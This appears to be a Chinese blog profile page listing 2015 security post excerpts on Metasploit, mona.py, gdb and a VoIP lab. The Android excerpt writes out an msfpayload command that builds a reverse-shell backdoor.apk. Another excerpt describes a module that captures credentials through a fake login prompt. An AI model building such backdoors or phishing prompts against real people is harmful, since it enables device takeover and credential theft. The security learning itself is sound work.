自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Nixawk

Get More About Security.

  • 博客(9)
  • 资源 (1)
  • 收藏
  • 关注

原创 exploit - mona.py - the manual

mona.pyInstall mona.pyPut mona.py into C:\Program Files\Immunity Inc\Immunity Debugger\PyCommandsBasic usageOpen Immunity Debugger. At the bottom of the application you should see an input box (comm

2015-02-27 14:07:31 3638

原创 Metasploit - Android meterpreter

Create a malicious apk fileCreate a malicious apk file (backdoor.apk), and raw is our format to output.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apkInstall

2015-02-24 01:25:07 3631

原创 Metasploit - InstallError: metasploit_data_models requires Ruby version >= 2.1

After command ‘git pull’, metasploit cann’t start with errors.[nixawk@core metasploit-framework]$ ./msfconsoleCould not find metasploit_data_models-0.23.0 in any of the sourcesRun `bundle install` to

2015-02-23 21:17:15 3385

原创 Metasploit - Loading External Modules

If you’re in the business of writing or collecting Metasploit modules that aren’t part of the standard distribution, then you need a convenient way to load those modules in Metasploit. Never fear, it’s

2015-02-14 11:11:00 941

原创 metasploit - debug

Prygem install pryNow let the fun begin! Lets pick a module to debug. require 'pry'...binding.pry...2.1.7 :001 > pry[1] pry(main)> helpHelp help Show a list of commands or informat

2015-02-11 13:02:27 1311

原创 Windows Gather User Credentials (phishing)

Description: This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sen

2015-02-10 15:39:48 1039

原创 VulnVoIP

主机探测目标: 192.168.108.196 目的: 了解VoIP相关安全问题探测主机开放 tcp/udp 端口, 获取端口相关的服务信息. [nixawk@core share]$ nmap -A -n -p 22,53,80,111,907,3306,4445,5038 192.168.108.196Starting Nmap 6.47 ( http://nmap.org ) at 201

2015-02-09 18:28:53 3637

原创 gdb - Examine

gdb - Examine (gdb) help x Examine memory: x/FMT ADDRESS. ADDRESS is an expression for the memory address to examine.

2015-02-06 00:17:38 1283

原创 Linux - Install Metasploit on Arch

Platform: Arch LinuxAuthor: Nixawk=========================================================1. sudo pacman -S git ruby gcc patch curl zlib readline autoconf automake diffutils make libtool bison li

2015-02-03 09:57:46 3035

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除